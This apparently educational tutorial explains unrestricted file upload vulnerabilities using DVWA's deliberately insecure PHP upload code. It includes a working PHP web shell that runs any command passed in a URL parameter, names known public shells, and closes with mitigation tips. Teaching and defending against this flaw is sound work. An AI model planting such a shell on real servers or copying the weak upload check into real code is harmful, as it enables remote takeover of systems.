A local file upload vulnerability is a vulnerability where an application allows a user to upload a malicious file directly which is then executed
A vulnerability where an application uses user input to fetch a remote file from a site on the Internet and store it locally. This file is then executed by an attacker.
There are really two classes of problems here.:
The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it.
The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for.
The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database,... It depends on what the application does with the uploaded file and especially where it is stored.
Some Weak Protections and Bypassing Methods:
Upload .jsp file into web tree - jsp code executed as the web user
Upload .gif file to be resized - image library flaw exploited
Upload .jpg file containing a Flash object - victim experiences Cross-site Content Hijacking.
Upload .php - can be executed on the server side or can be dangerous on the client side
Upload file using malicious path or name - overwrite a critical file
Upload file containing personal data - other users access it
Examples of DVWA:
The code below makes two critical mistakes which create a file upload vulnerability.
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
}
Example of PHP script in a Linux server:
<?php
echo system('uname -a');
?>
if access this file in server the uname -a command will executed. And it will show the kernel release, system version information
What if we build more a little bit html:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
We will get this when we access our file:
Based on that, we can develop a complete file and features...
There are many php shell public very famous as China Chopper, WSO, C99, B374K,....
Someway to avoid remote file upload vulnerabilities:
It is important to check a file upload module's access controls to examine the risks properly.
• Only allow specific file extensions.
• Only allow authorized and authenticated users to use the feature.
• Check any file fetched from the Web for content. Make sure it is actually an image or whatever file type you expect.
• Serve fetched files from your application rather than directly via the web server.
• Store files in a non-public accessibly directory if you can.
• Write to the file when you store it to include a header that makes it non-executable.
